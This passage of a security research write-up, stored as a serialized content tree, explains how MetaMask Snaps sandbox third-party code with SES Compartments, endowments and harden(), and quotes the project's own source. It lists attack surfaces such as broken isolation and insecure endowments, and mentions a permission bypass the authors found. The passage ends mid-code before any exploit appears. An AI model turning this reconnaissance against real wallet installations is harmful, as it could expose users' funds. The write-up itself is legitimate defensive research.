a tightly controlled sandboxed execution environment. This is accomplished by manipulating the ",{"type":26,"tag":130,"props":40009,"children":40011},{"className":40010},[],[40012],{"type":32,"value":40013},"globalThis",{"type":32,"value":40015}," object to exclusively accommodate secure functions. Consequently, any code executed within this controlled ",{"type":26,"tag":130,"props":40017,"children":40019},{"className":40018},[],[40020],{"type":32,"value":40013},{"type":32,"value":40022}," context is incapable of tampering with security.",{"type":26,"tag":5512,"props":40024,"children":40026},{"className":38209,"code":40025,"language":38211,"meta":7,"style":7},"const c = new Compartment();\nc.globalThis === globalThis; // false\nc.globalThis.JSON === JSON; // true\n",[40027],{"type":26,"tag":130,"props":40028,"children":40029},{"__ignoreMap":7},[40030,40059,40092],{"type":26,"tag":137,"props":40031,"children":40032},{"class":5559,"line":5560},[40033,40037,40042,40046,40050,40055],{"type":26,"tag":137,"props":40034,"children":40035},{"style":5573},[40036],{"type":32,"value":12244},{"type":26,"tag":137,"props":40038,"children":40039},{"style":5584},[40040],{"type":32,"value":40041}," c",{"type":26,"tag":137,"props":40043,"children":40044},{"style":5590},[40045],{"type":32,"value":5593},{"type":26,"tag":137,"props":40047,"children":40048},{"style":5573},[40049],{"type":32,"value":34528},{"type":26,"tag":137,"props":40051,"children":40052},{"style":5682},[40053],{"type":32,"value":40054}," Compartment",{"type":26,"tag":137,"props":40056,"children":40057},{"style":5601},[40058],{"type":32,"value":6267},{"type":26,"tag":137,"props":40060,"children":40061},{"class":5559,"line":5412},[40062,40066,40070,40074,40078,40083,40087],{"type":26,"tag":137,"props":40063,"children":40064},{"style":5584},[40065],{"type":32,"value":4326},{"type":26,"tag":137,"props":40067,"children":40068},{"style":5601},[40069],{"type":32,"value":470},{"type":26,"tag":137,"props":40071,"children":40072},{"style":5584},[40073],{"type":32,"value":40013},{"type":26,"tag":137,"props":40075,"children":40076},{"style":5590},[40077],{"type":32,"value":34017},{"type":26,"tag":137,"props":40079,"children":40080},{"style":5584},[40081],{"type":32,"value":40082}," globalThis",{"type":26,"tag":137,"props":40084,"children":40085},{"style":5601},[40086],{"type":32,"value":19820},{"type":26,"tag":137,"props":40088,"children":40089},{"style":5564},[40090],{"type":32,"value":40091},"// false\n",{"type":26,"tag":137,"props":40093,"children":40094},{"class":5559,"line":5417},[40095,40099,40103,40107,40111,40116,40120,40125,40129],{"type":26,"tag":137,"props":40096,"children":40097},{"style":5584},[40098],{"type":32,"value":4326},{"type":26,"tag":137,"props":40100,"children":40101},{"style":5601},[40102],{"type":32,"value":470},{"type":26,"tag":137,"props":40104,"children":40105},{"style":5584},[40106],{"type":32,"value":40013},{"type":26,"tag":137,"props":40108,"children":40109},{"style":5601},[40110],{"type":32,"value":470},{"type":26,"tag":137,"props":40112,"children":40113},{"style":5584},[40114],{"type":32,"value":40115},"JSON",{"type":26,"tag":137,"props":40117,"children":40118},{"style":5590},[40119],{"type":32,"value":34017},{"type":26,"tag":137,"props":40121,"children":40122},{"style":5584},[40123],{"type":32,"value":40124}," JSON",{"type":26,"tag":137,"props":40126,"children":40127},{"style":5601},[40128],{"type":32,"value":19820},{"type":26,"tag":137,"props":40130,"children":40131},{"style":5564},[40132],{"type":32,"value":40133},"// true\n",{"type":26,"tag":35,"props":40135,"children":40136},{},[40137,40139,40145,40147,40153,40155,40160],{"type":32,"value":40138},"Compartment also changes the behaviour of evaluators functions such as ",{"type":26,"tag":130,"props":40140,"children":40142},{"className":40141},[],[40143],{"type":32,"value":40144},"eval",{"type":32,"value":40146}," and the ",{"type":26,"tag":130,"props":40148,"children":40150},{"className":40149},[],[40151],{"type":32,"value":40152},"Function",{"type":32,"value":40154}," constructor, so that the evaluated code is also executed within the sandboxed ",{"type":26,"tag":130,"props":40156,"children":40158},{"className":40157},[],[40159],{"type":32,"value":40013},{"type":32,"value":470},{"type":26,"tag":39942,"props":40162,"children":40164},{"id":40163},"endowments",[40165],{"type":32,"value":40166},"Endowments",{"type":26,"tag":35,"props":40168,"children":40169},{},[40170,40172,40176,40178,40183],{"type":32,"value":40171},"While creating a Compartment, it is possible to specify ",{"type":26,"tag":762,"props":40173,"children":40174},{},[40175],{"type":32,"value":40163},{"type":32,"value":40177},". These endowments constitute objects that become accessible within the Compartment's ",{"type":26,"tag":130,"props":40179,"children":40181},{"className":40180},[],[40182],{"type":32,"value":40013},{"type":32,"value":40184},". However, endowments need to be carefully chosen and sanitized since they will be exposed to the untrusted environment.",{"type":26,"tag":35,"props":40186,"children":40187},{},[40188,40190,40196],{"type":32,"value":40189},"In addition, SES provides the ",{"type":26,"tag":130,"props":40191,"children":40193},{"className":40192},[],[40194],{"type":32,"value":40195},"harden()",{"type":32,"value":40197}," function, which is mainly used to prevent the endowments to be modified by a malicious code executed in a Compartment.",{"type":26,"tag":21485,"props":40199,"children":40201},{"id":40200},"setting-up-snaps-execution-env",[40202],{"type":32,"value":40203},"Setting up Snaps Execution Env",{"type":26,"tag":35,"props":40205,"children":40206},{},[40207],{"type":32,"value":40208},"When starting a snap, the setup follows these steps:",{"type":26,"tag":4820,"props":40210,"children":40211},{},[40212],{"type":26,"tag":3430,"props":40213,"children":40214},{},[40215],{"type":26,"tag":84,"props":40216,"children":40217},{},[40218,40220],{"type":32,"value":40219},"Create endowments based on snap ",{"type":26,"tag":41,"props":40221,"children":40224},{"href":40222,"rel":40223},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L327",[45],[40225],{"type":32,"value":40226},"permissions",{"type":26,"tag":5512,"props":40228,"children":40230},{"className":38209,"code":40229,"language":38211,"meta":7,"style":7},"const { endowments, teardown: endowmentTeardown } = createEndowments(\n    snap,\n    ethereum,\n    snapId,\n    _endowments,\n);\n",[40231],{"type":26,"tag":130,"props":40232,"children":40233},{"__ignoreMap":7},[40234,40284,40296,40307,40319,40331],{"type":26,"tag":137,"props":40235,"children":40236},{"class":5559,"line":5560},[40237,40241,40245,40249,40253,40258,40262,40267,40271,40275,40280],{"type":26,"tag":137,"props":40238,"children":40239},{"style":5573},[40240],{"type":32,"value":12244},{"type":26,"tag":137,"props":40242,"children":40243},{"style":5601},[40244],{"type":32,"value":12175},{"type":26,"tag":137,"props":40246,"children":40247},{"style":5584},[40248],{"type":32,"value":40163},{"type":26,"tag":137,"props":40250,"children":40251},{"style":5601},[40252],{"type":32,"value":1108},{"type":26,"tag":137,"props":40254,"children":40255},{"style":5584},[40256],{"type":32,"value":40257},"teardown",{"type":26,"tag":137,"props":40259,"children":40260},{"style":5601},[40261],{"type":32,"value":17923},{"type":26,"tag":137,"props":40263,"children":40264},{"style":5584},[40265],{"type":32,"value":40266},"endowmentTeardown",{"type":26,"tag":137,"props":40268,"children":40269},{"style":5601},[40270],{"type":32,"value":38798},{"type":26,"tag":137,"props":40272,"children":40273},{"style":5590},[40274],{"type":32,"value":289},{"type":26,"tag":137,"props":40276,"children":40277},{"style":5682},[40278],{"type":32,"value":40279}," createEndowments",{"type":26,"tag":137,"props":40281,"children":40282},{"style":5601},[40283],{"type":32,"value":6054},{"type":26,"tag":137,"props":40285,"children":40286},{"class":5559,"line":5412},[40287,40292],{"type":26,"tag":137,"props":40288,"children":40289},{"style":5584},[40290],{"type":32,"value":40291},"    snap",{"type":26,"tag":137,"props":40293,"children":40294},{"style":5601},[40295],{"type":32,"value":6099},{"type":26,"tag":137,"props":40297,"children":40298},{"class":5559,"line":5417},[40299,40303],{"type":26,"tag":137,"props":40300,"children":40301},{"style":5584},[40302],{"type":32,"value":34079},{"type":26,"tag":137,"props":40304,"children":40305},{"style":5601},[40306],{"type":32,"value":6099},{"type":26,"tag":137,"props":40308,"children":40309},{"class":5559,"line":5642},[40310,40315],{"type":26,"tag":137,"props":40311,"children":40312},{"style":5584},[40313],{"type":32,"value":40314},"    snapId",{"type":26,"tag":137,"props":40316,"children":40317},{"style":5601},[40318],{"type":32,"value":6099},{"type":26,"tag":137,"props":40320,"children":40321},{"class":5559,"line":5745},[40322,40327],{"type":26,"tag":137,"props":40323,"children":40324},{"style":5584},[40325],{"type":32,"value":40326},"    _endowments",{"type":26,"tag":137,"props":40328,"children":40329},{"style":5601},[40330],{"type":32,"value":6099},{"type":26,"tag":137,"props":40332,"children":40333},{"class":5559,"line":5850},[40334],{"type":26,"tag":137,"props":40335,"children":40336},{"style":5601},[40337],{"type":32,"value":6430},{"type":26,"tag":35,"props":40339,"children":40340},{},[40341],{"type":32,"value":40342},"In the snap development, the required permissions need to be specified in a snap manifest file. Some of these permissions expose extra functions as endowments in the Compartment.",{"type":26,"tag":35,"props":40344,"children":40345},{},[40346,40348,40354,40356,40362],{"type":32,"value":40347},"One clear example is the ",{"type":26,"tag":130,"props":40349,"children":40351},{"className":40350},[],[40352],{"type":32,"value":40353},"endowment:network-access",{"type":32,"value":40355}," permission, that adds the ",{"type":26,"tag":130,"props":40357,"children":40359},{"className":40358},[],[40360],{"type":32,"value":40361},"fetch()",{"type":32,"value":40363}," function to the endowments.",{"type":26,"tag":35,"props":40365,"children":40366},{},[40367,40369,40375],{"type":32,"value":40368},"All endowments are protected with the ",{"type":26,"tag":130,"props":40370,"children":40372},{"className":40371},[],[40373],{"type":32,"value":40374},"harden",{"type":32,"value":40376}," function to prevent possible exploits derived from the endowment modification, with two exceptions.",{"type":26,"tag":4820,"props":40378,"children":40379},{"start":5412},[40380],{"type":26,"tag":3430,"props":40381,"children":40382},{},[40383],{"type":26,"tag":84,"props":40384,"children":40385},{},[40386,40388],{"type":32,"value":40387},"Create the snap ",{"type":26,"tag":41,"props":40389,"children":40392},{"href":40390,"rel":40391},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L345",[45],[40393],{"type":32,"value":39999},{"type":26,"tag":5512,"props":40395,"children":40397},{"className":38209,"code":40396,"language":38211,"meta":7,"style":7},"const compartment = new Compartment({\n    ...endowments,\n    module: snapModule,\n    exports: snapModule.exports,\n});\n",[40398],{"type":26,"tag":130,"props":40399,"children":40400},{"__ignoreMap":7},[40401,40429,40445,40462,40487],{"type":26,"tag":137,"props":40402,"children":40403},{"class":5559,"line":5560},[40404,40408,40413,40417,40421,40425],{"type":26,"tag":137,"props":40405,"children":40406},{"style":5573},[40407],{"type":32,"value":12244},{"type":26,"tag":137,"props":40409,"children":40410},{"style":5584},[40411],{"type":32,"value":40412}," compartment",{"type":26,"tag":137,"props":40414,"children":40415},{"style":5590},[40416],{"type":32,"value":5593},{"type":26,"tag":137,"props":40418,"children":40419},{"style":5573},[40420],{"type":32,"value":34528},{"type":26,"tag":137,"props":40422,"children":40423},{"style":5682},[40424],{"type":32,"value":40054},{"type":26,"tag":137,"props":40426,"children":40427},{"style":5601},[40428],{"type":32,"value":17732},{"type":26,"tag":137,"props":40430,"children":40431},{"class":5559,"line":5412},[40432,40437,40441],{"type":26,"tag":137,"props":40433,"children":40434},{"style":5590},[40435],{"type":32,"value":40436},"    ...",{"type":26,"tag":137,"props":40438,"children":40439},{"style":5584},[40440],{"type":32,"value":40163},{"type":26,"tag":137,"props":40442,"children":40443},{"style":5601},[40444],{"type":32,"value":6099},{"type":26,"tag":137,"props":40446,"children":40447},{"class":5559,"line":5417},[40448,40453,40458],{"type":26,"tag":137,"props":40449,"children":40450},{"style":5584},[40451],{"type":32,"value":40452},"    module:",{"type":26,"tag":137,"props":40454,"children":40455},{"style":5584},[40456],{"type":32,"value":40457}," snapModule",{"type":26,"tag":137,"props":40459,"children":40460},{"style":5601},[40461],{"type":32,"value":6099},{"type":26,"tag":137,"props":40463,"children":40464},{"class":5559,"line":5642},[40465,40470,40474,40478,40483],{"type":26,"tag":137,"props":40466,"children":40467},{"style":5584},[40468],{"type":32,"value":40469},"    exports:",{"type":26,"tag":137,"props":40471,"children":40472},{"style":5584},[40473],{"type":32,"value":40457},{"type":26,"tag":137,"props":40475,"children":40476},{"style":5601},[40477],{"type":32,"value":470},{"type":26,"tag":137,"props":40479,"children":40480},{"style":5584},[40481],{"type":32,"value":40482},"exports",{"type":26,"tag":137,"props":40484,"children":40485},{"style":5601},[40486],{"type":32,"value":6099},{"type":26,"tag":137,"props":40488,"children":40489},{"class":5559,"line":5745},[40490],{"type":26,"tag":137,"props":40491,"children":40492},{"style":5601},[40493],{"type":32,"value":37934},{"type":26,"tag":35,"props":40495,"children":40496},{},[40497,40499,40505,40506,40511,40513,40518],{"type":32,"value":40498},"Note: ",{"type":26,"tag":130,"props":40500,"children":40502},{"className":40501},[],[40503],{"type":32,"value":40504},"module",{"type":32,"value":3339},{"type":26,"tag":130,"props":40507,"children":40509},{"className":40508},[],[40510],{"type":32,"value":40482},{"type":32,"value":40512}," are passed as endowments, but without being ",{"type":26,"tag":762,"props":40514,"children":40515},{},[40516],{"type":32,"value":40517},"hardened",{"type":32,"value":40519},". This is intentional, as the snap needs to export functions to be correctly executed.",{"type":26,"tag":4820,"props":40521,"children":40522},{"start":5417},[40523],{"type":26,"tag":3430,"props":40524,"children":40525},{},[40526],{"type":26,"tag":84,"props":40527,"children":40528},{},[40529,40531],{"type":32,"value":40530},"Evaluate the snap code inside the ",{"type":26,"tag":41,"props":40532,"children":40535},{"href":40533,"rel":40534},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L359",[45],[40536],{"type":32,"value":39999},{"type":26,"tag":5512,"props":40538,"children":40540},{"className":38209,"code":40539,"language":38211,"meta":7,"style":7},"await this.executeInSnapContext(snapId, () => {\n    compartment.evaluate(sourceCode);\n    this.registerSnapExports(snapId, snapModule);\n});\n",[40541],{"type":26,"tag":130,"props":40542,"children":40543},{"__ignoreMap":7},[40544,40585,40615,40652],{"type":26,"tag":137,"props":40545,"children":40546},{"class":5559,"line":5560},[40547,40551,40555,40559,40564,40568,40572,40577,40581],{"type":26,"tag":137,"props":40548,"children":40549},{"style":5610},[40550],{"type":32,"value":35512},{"type":26,"tag":137,"props":40552,"children":40553},{"style":5573},[40554],{"type":32,"value":38312},{"type":26,"tag":137,"props":40556,"children":40557},{"style":5601},[40558],{"type":32,"value":470},{"type":26,"tag":137,"props":40560,"children":40561},{"style":5682},[40562],{"type":32,"value":40563},"executeInSnapContext",{"type":26,"tag":137,"props":40565,"children":40566},{"style":5601},[40567],{"type":32,"value":165},{"type":26,"tag":137,"props":40569,"children":40570},{"style":5584},[40571],{"type":32,"value":38616},{"type":26,"tag":137,"props":40573,"children":40574},{"style":5601},[40575],{"type":32,"value":40576},", () ",{"type":26,"tag":137,"props":40578,"children":40579},{"style":5573},[40580],{"type":32,"value":17413},{"type":26,"tag":137,"props":40582,"children":40583},{"style":5601},[40584],{"type":32,"value":5875},{"type":26,"tag":137,"props":40586,"children":40587},{"class":5559,"line":5412},[40588,40593,40597,40602,40606,40611],{"type":26,"tag":137,"props":40589,"children":40590},{"style":5584},[40591],{"type":32,"value":40592},"    compartment",{"type":26,"tag":137,"props":40594,"children":40595},{"style":5601},[40596],{"type":32,"value":470},{"type":26,"tag":137,"props":40598,"children":40599},{"style":5682},[40600],{"type":32,"value":40601},"evaluate",{"type":26,"tag":137,"props":40603,"children":40604},{"style":5601},[40605],{"type":32,"value":165},{"type":26,"tag":137,"props":40607,"children":40608},{"style":5584},[40609],{"type":32,"value":40610},"sourceCode",{"type":26,"tag":137,"props":40612,"children":40613},{"style":5601},[40614],{"type":32,"value":6430},{"type":26,"tag":137,"props":40616,"children":40617},{"class":5559,"line":5417},[40618,40622,40626,40631,40635,40639,40643,40648],{"type":26,"tag":137,"props":40619,"children":40620},{"style":5573},[40621],{"type":32,"value":38660},{"type":26,"tag":137,"props":40623,"children":40624},{"style":5601},[40625],{"type":32,"value":470},{"type":26,"tag":137,"props":40627,"children":40628},{"style":5682},[40629],{"type":32,"value":40630},"registerSnapExports",{"type":26,"tag":137,"props":40632,"children":40633},{"style":5601},[40634],{"type":32,"value":165},{"type":26,"tag":137,"props":40636,"children":40637},{"style":5584},[40638],{"type":32,"value":38616},{"type":26,"tag":137,"props":40640,"children":40641},{"style":5601},[40642],{"type":32,"value":1108},{"type":26,"tag":137,"props":40644,"children":40645},{"style":5584},[40646],{"type":32,"value":40647},"snapModule",{"type":26,"tag":137,"props":40649,"children":40650},{"style":5601},[40651],{"type":32,"value":6430},{"type":26,"tag":137,"props":40653,"children":40654},{"class":5559,"line":5642},[40655],{"type":26,"tag":137,"props":40656,"children":40657},{"style":5601},[40658],{"type":32,"value":37934},{"type":26,"tag":35,"props":40660,"children":40661},{},[40662,40664,40670,40671,40677,40678,40684],{"type":32,"value":40663},"According to the documentation, the snap must contain one of the following function exports: ",{"type":26,"tag":130,"props":40665,"children":40667},{"className":40666},[],[40668],{"type":32,"value":40669},"onRpcRequest",{"type":32,"value":1108},{"type":26,"tag":130,"props":40672,"children":40674},{"className":40673},[],[40675],{"type":32,"value":40676},"onTransaction",{"type":32,"value":15725},{"type":26,"tag":130,"props":40679,"children":40681},{"className":40680},[],[40682],{"type":32,"value":40683},"onCronjob",{"type":32,"value":470},{"type":26,"tag":35,"props":40686,"children":40687},{},[40688,40690,40695],{"type":32,"value":40689},"Once the Compartment creates these functions, no matter where they are executed, they will always be evaluated within the sandboxed ",{"type":26,"tag":130,"props":40691,"children":40693},{"className":40692},[],[40694],{"type":32,"value":40013},{"type":32,"value":40696}," environment of that Compartment.",{"type":26,"tag":35,"props":40698,"children":40699},{},[40700],{"type":32,"value":40701},"After the evaluation, the function exports are registered and executed later when the respective event is emmited.",{"type":26,"tag":92,"props":40703,"children":40705},{"id":40704},"vulnerability-research",[40706],{"type":32,"value":40707},"Vulnerability research",{"type":26,"tag":118,"props":40709,"children":40711},{"id":40710},"possible-attacks",[40712],{"type":32,"value":40713},"Possible attacks",{"type":26,"tag":35,"props":40715,"children":40716},{},[40717],{"type":32,"value":40718},"While searching for vulnerabilities in snap environments, we enumerated some features that can be broken, and lead to security issues, such as:",{"type":26,"tag":3426,"props":40720,"children":40721},{},[40722,40727,40732,40737],{"type":26,"tag":3430,"props":40723,"children":40724},{},[40725],{"type":32,"value":40726},"Broken SES Container isolation",{"type":26,"tag":3430,"props":40728,"children":40729},{},[40730],{"type":32,"value":40731},"Insecure endowments in Containers",{"type":26,"tag":3430,"props":40733,"children":40734},{},[40735],{"type":32,"value":40736},"Incorrect RPC permission checks",{"type":26,"tag":3430,"props":40738,"children":40739},{},[40740],{"type":32,"value":40741},"Insecure snap installation/update",{"type":26,"tag":35,"props":40743,"children":40744},{},[40745],{"type":32,"value":40746},"We went through all of these vulnerabilities assumptions, and found a minor permission bypass bug using insecure endowments.",{"type":26,"tag":35,"props":40748,"children":40749},{},[40750],{"type":32,"value":40751},"To understand the exploit, we need to dig into the snap's RPC interfaces exposed via endowments.",{"type":26,"tag":118,"props":40753,"children":40755},{"id":40754},"rpc-interfaces-endowments",[40756],{"type":32,"value":40757},"RPC interfaces endowments",{"type":26,"tag":21485,"props":40759,"children":40761},{"id":40760},"providers-limitations",[40762],{"type":32,"value":40763},"Providers limitations",{"type":26,"tag":35,"props":40765,"children":40766},{},[40767,40769,40775,40776,40781,40783,40790],{"type":32,"value":40768},"A snap has two interfaces that can be used to communicate with metamask RPC interface: ",{"type":26,"tag":130,"props":40770,"children":40772},{"className":40771},[],[40773],{"type":32,"value":40774},"snap",{"type":32,"value":3339},{"type":26,"tag":130,"props":40777,"children":40779},{"className":40778},[],[40780],{"type":32,"value":34012},{"type":32,"value":40782}," (EIP-1193). These differ in that each one can only send a subset of the available RPC ",{"type":26,"tag":41,"props":40784,"children":40787},{"href":40785,"rel":40786},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/utils.ts#L130",[45],[40788],{"type":32,"value":40789},"methods",{"type":32,"value":7072},{"type":26,"tag":5512,"props":40792,"children":40794},{"className":38209,"code":40793,"language":38211,"meta":7,"style":7},"export function assertSnapOutboundRequest(args: RequestArguments) {\n  // Disallow any non `wallet_` or `snap_` methods for separation of concerns.\n  assert(\n    String.prototype.startsWith.call(args.method, 'wallet_') ||\n      String.prototype.startsWith.call(args.method, 'snap_'),\n    'The global Snap API only allows RPC methods starting with `wallet_*` and `snap_*`.',\n  );\n  assert(\n    !BLOCKED_RPC_METHODS.includes(args.method),\n    ethErrors.rpc.methodNotFound({\n      data: {\n        method: args.method,\n      },\n    }),\n  );\n  assertStruct(args, JsonStruct, 'Provided value is not JSON-RPC compatible');\n}\n",[40795],{"type":26,"tag":130,"props":40796,"children":40797},{"__ignoreMap":7},[40798,40838,40846,40858,40928,40989,41001,41009,41020,41060,41090,41102,41127,41134,41142,41149,41187],{"type":26,"tag":137,"props":40799,"children":40800},{"class":5559,"line":5560},[40801,40806,40811,40816,40820,40825,40829,40834],{"type":26,"tag":137,"props":40802,"children":40803},{"style":5610},[40804],{"type":32,"value":40805},"export",{"type":26,"tag":137,"props":40807,"children":40808},{"style":5573},[40809],{"type":32,"value":40810}," function",{"type":26,"tag":137,"props":40812,"children":40813},{"style":5682},[40814],{"type":32,"value":40815}," assertSnapOutboundRequest",{"type":26,"tag":137,"props":40817,"children":40818},{"style":5601},[40819],{"type":32,"value":165},{"type":26,"tag":137,"props":40821,"children":40822},{"style":5584},[40823],{"type":32,"value":40824},"args",{"type":26,"tag":137,"props":40826,"children":40827},{"style":5590},[40828],{"type":32,"value":7072},{"type":26,"tag":137,"props":40830,"children":40831},{"style":6009},[40832],{"type":32,"value":40833}," RequestArguments",{"type":26,"tag":137,"props":40835,"children":40836},{"style":5601},[40837],{"type":32,"value":17395},{"type":26,"tag":137,"props":40839,"children":40840},{"class":5559,"line":5412},[40841],{"type":26,"tag":137,"props":40842,"children":40843},{"style":5564},[40844],{"type":32,"value":40845},"  // Disallow any non `wallet_` or `snap_` methods for separation of concerns.\n",{"type":26,"tag":137,"props":40847,"children":40848},{"class":5559,"line":5417},[40849,40854],{"type":26,"tag":137,"props":40850,"children":40851},{"style":5682},[40852],{"type":32,"value":40853},"  assert",{"type":26,"tag":137,"props":40855,"children":40856},{"style":5601},[40857],{"type":32,"value":6054},{"type":26,"tag":137,"props":40859,"children":40860},{"class":5559,"line":5642},[40861,40866,40870,40875,40879,40884,40888,40893,40897,40901,40905,40910,40914,40919,40923],{"type":26,"tag":137,"props":40862,"children":40863},{"style":6009},[40864],{"type":32,"value":40865},"    String",{"type":26,"tag":137,"props":40867,"children":40868},{"style":5601},[40869],{"type":32,"value":470},{"type":26,"tag":137,"props":40871,"children":40872},{"style":5584},[40873],{"type":32,"value":40874},"prototype",{"type":26,"tag":137,"props":40876,"children":40877},{"style":5601},[40878],{"type":32,"value":470},{"type":26,"tag":137,"props":40880,"children":40881},{"style":5584},[40882],{"type":32,"value":40883},"startsWith",{"type":26,"tag":137,"props":40885,"children":40886},{"style":5601},[40887],{"type":32,"value":470},{"type":26,"tag":137,"props":40889,"children":40890},{"style":5682},[40891],{"type":32,"value":40892},"call",{"type":26,"tag":137,"props":40894,"children":40895},{"style":5601},[40896],{"type":32,"value":165},{"type":26,"tag":137,"props":40898,"children":40899},{"style":5584},[40900],{"type":32,"value":40824},{"type":26,"tag":137,"props":40902,"children":40903},{"style":5601},[40904],{"type":32,"value":470},{"type":26,"tag":137,"props":40906,"children":40907},{"style":5584},[40908],{"type":32,"value":40909},"method",{"type":26,"tag":137,"props":40911,"children":40912},{"style":5601},[40913],{"type":32,"value":1108},{"type":26,"tag":137,"props":40915,"children":40916},{"style":6837},[40917],{"type":32,"value":40918},"'wallet_'",{"type":26,"tag":137,"props":40920,"children":40921},{"style":5601},[40922],{"type":32,"value":5671},{"type":26,"tag":137,"props":40924,"children":40925},{"style":5590},[40926],{"type":32,"value":40927},"||\n",{"type":26,"tag":137,"props":40929,"children":40930},{"class":5559,"line":5745},[40931,40936,40940,40944,40948,40952,40956,40960,40964,40968,40972,40976,40980,40985],{"type":26,"tag":137,"props":40932,"children":40933},{"style":6009},[40934],{"type":32,"value":40935},"      String",{"type":26,"tag":137,"props":40937,"children":40938},{"style":5601},[40939],{"type":32,"value":470},{"type":26,"tag":137,"props":40941,"children":40942},{"style":5584},[40943],{"type":32,"value":40874},{"type":26,"tag":137,"props":40945,"children":40946},{"style":5601},[40947],{"type":32,"value":470},{"type":26,"tag":137,"props":40949,"children":40950},{"style":5584},[40951],{"type":32,"value":40883},{"type":26,"tag":137,"props":40953,"children":40954},{"style":5601},[40955],{"type":32,"value":470},{"type":26,"tag":137,"props":40957,"children":40958},{"style":5682},[40959],{"type":32,"value":40892},{"type":26,"tag":137,"props":40961,"children":40962},{"style":5601},[40963],{"type":32,"value":165},{"type":26,"tag":137,"props":40965,"children":40966},{"style":5584},[40967],{"type":32,"value":40824},{"type":26,"tag":137,"props":40969,"children":40970},{"style":5601},[40971],{"type":32,"value":470},{"type":26,"tag":137,"props":40973,"children":40974},{"style":5584},[40975],{"type":32,"value":40909},{"type":26,"tag":137,"props":40977,"children":40978},{"style":5601},[40979],{"type":32,"value":1108},{"type":26,"tag":137,"props":40981,"children":40982},{"style":6837},[40983],{"type":32,"value":40984},"'snap_'",{"type":26,"tag":137,"props":40986,"children":40987},{"style":5601},[40988],{"type":32,"value":9320},{"type":26,"tag":137,"props":40990,"children":40991},{"class":5559,"line":5850},[40992,40997],{"type":26,"tag":137,"props":40993,"children":40994},{"style":6837},[40995],{"type":32,"value":40996},"    'The global Snap API only allows RPC methods starting with `wallet_*` and `snap_*`.'",{"type":26,"tag":137,"props":40998,"children":40999},{"style":5601},[41000],{"type":32,"value":6099},{"type":26,"tag":137,"props":41002,"children":41003},{"class":5559,"line":5878},[41004],{"type":26,"tag":137,"props":41005,"children":41006},{"style":5601},[41007],{"type":32,"value":41008},"  );\n",{"type":26,"tag":137,"props":41010,"children":41011},{"class":5559,"line":5891},[41012,41016],{"type":26,"tag":137,"props":41013,"children":41014},{"style":5682},[41015],{"type":32,"value":40853},{"type":26,"tag":137,"props":41017,"children":41018},{"style":5601},[41019],{"type":32,"value":6054},{"type":26,"tag":137,"props":41021,"children":41022},{"class":5559,"line":5909},[41023,41027,41032,41036,41040,41044,41048,41052,41056],{"type":26,"tag":137,"props":41024,"children":41025},{"style":5590},[41026],{"type":32,"value":23563},{"type":26,"tag":137,"props":41028,"children":41029},{"style":5584},[41030],{"type":32,"value":41031},"BLOCKED_RPC_METHODS",{"type":26,"tag":137,"props":41033,"children":41034},{"style":5601},[41035],{"type":32,"value":470},{"type":26,"tag":137,"props":41037,"children":41038},{"style":5682},[41039],{"type":32,"value":37777},{"type":26,"tag":137,"props":41041,"children":41042},{"style":5601},[41043],{"type":32,"value":165},{"type":26,"tag":137,"props":41045,"children":41046},{"style":5584},[41047],{"type":32,"value":40824},{"type":26,"tag":137,"props":41049,"children":41050},{"style":5601},[41051],{"type":32,"value":470},{"type":26,"tag":137,"props":41053,"children":41054},{"style":5584},[41055],{"type":32,"value":40909},{"type":26,"tag":137,"props":41057,"children":41058},{"style":5601},[41059],{"type":32,"value":9320},{"type":26,"tag":137,"props":41061,"children":41062},{"class":5559,"line":5930},[41063,41068,41072,41077,41081,41086],{"type":26,"tag":137,"props":41064,"children":41065},{"style":5584},[41066],{"type":32,"value":41067},"    ethErrors",{"type":26,"tag":137,"props":41069,"children":41070},{"style":5601},[41071],{"type":32,"value":470},{"type":26,"tag":137,"props":41073,"children":41074},{"style":5584},[41075],{"type":32,"value":41076},"rpc",{"type":26,"tag":137,"props":41078,"children":41079},{"style":5601},[41080],{"type":32,"value":470},{"type":26,"tag":137,"props":41082,"children":41083},{"style":5682},[41084],{"type":32,"value":41085},"methodNotFound",{"type":26,"tag":137,"props":41087,"children":41088},{"style":5601},[41089],{"type":32,"value":17732},{"type":26,"tag":137,"props":41091,"children":41092},{"class":5559,"line":5939},[41093,41098],{"type":26,"tag":137,"props":41094,"children":41095},{"style":5584},[41096],{"type":32,"value":41097},"      data:",{"type":26,"tag":137,"props":41099,"children":41100},{"style":5601},[41101],{"type":32,"value":5875},{"type":26,"tag":137,"props":41103,"children":41104},{"class":5559,"line":6191},[41105,41110,41115,41119,41123],{"type":26,"tag":137,"props":41106,"children":41107},{"style":5584},[41108],{"type":32,"value":41109},"        method:",{"type":26,"tag":137,"props":41111,"children":41112},{"style":5584},[41113],{"type":32,"value":41114}," args",{"type":26,"tag":137,"props":41116,"children":41117},{"style":5601},[41118],{"type":32,"value":470},{"type":26,"tag":137,"props":41120,"children":41121},{"style":5584},[41122],{"type":32,"value":40909},{"type":26,"tag":137,"props":41124,"children":41125},{"style":5601},[41126],{"type":32,"value":6099},{"type":26,"tag":137,"props":41128,"children":41129},{"class":5559,"line":6208},[41130],{"type":26,"tag":137,"props":41131,"children":41132},{"style":5601},[41133],{"type":32,"value":39795},{"type":26,"tag":137,"props":41135,"children":41136},{"class":5559,"line":6225},[41137],{"type":26,"tag":137,"props":41138,"children":41139},{"style":5601},[41140],{"type":32,"value":41141},"    }),\n",{"type":26,"tag":137,"props":41143,"children":41144},{"class":5559,"line":6238},[41145],{"type":26,"tag":137,"props":41146,"children":41147},{"style":5601},[41148],{"type":32,"value":41008},{"type":26,"tag":137,"props":41150,"children":41151},{"class":5559,"line":6247},[41152,41157,41161,41165,41169,41174,41178,41183],{"type":26,"tag":137,"props":41153,"children":41154},{"style":5682},[41155],{"type":32,"value":41156},"  